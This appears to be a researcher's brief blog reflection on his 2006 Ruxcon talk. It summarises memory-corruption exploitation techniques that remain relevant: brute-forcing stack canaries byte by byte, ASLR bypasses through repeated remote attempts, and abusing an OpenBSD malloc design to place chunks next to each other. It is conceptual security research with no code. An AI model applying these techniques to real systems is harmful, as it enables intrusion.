In September of 2006 I released the following slide deck:
It was the first time I had ever spoken to a technical audience (Ruxcon in Sydney, Australia), and in retrospect it was a horribly boring presentation. Even still, there's some technical content in this slide deck that is still passingly relevant today:
- Even though server-side memory corrpuption bugs have been fairly sparse lately, using non-null-terminated overflows to do a byte-for-byte bruteforce of canary values is still possible in some instances. The technique was even featured in a recent Phrack article (Issue 67, Article 13).
- Similarly, the ASLR bypasses are probably still good for any remote exploits that can "replay" consecutive attempts without triggering a module/shared library rebase.
- Finally, the approach to finding heap exploitation techniques still applies to a lot of custom allocators. Back in 2006, OpenBSD had just reimplemented malloc to remove inline heap structures at the beginning (or end) of each chunk. Unfortunately, their implementation used itself to allocate memory for sensitive heap structures (i.e. malloc was used by malloc). This means that an attacker could relatively easily ensure that an "interesting" chunk would be adjacent to the chunk being overflowed, irregardless of application specific behavior. Generally speaking, if the heap implementation can be induced into allocating and using a chunk of memory that is contiguously after application chunks, then that heap implementation is broken.
- email@example.com (@benhawkes)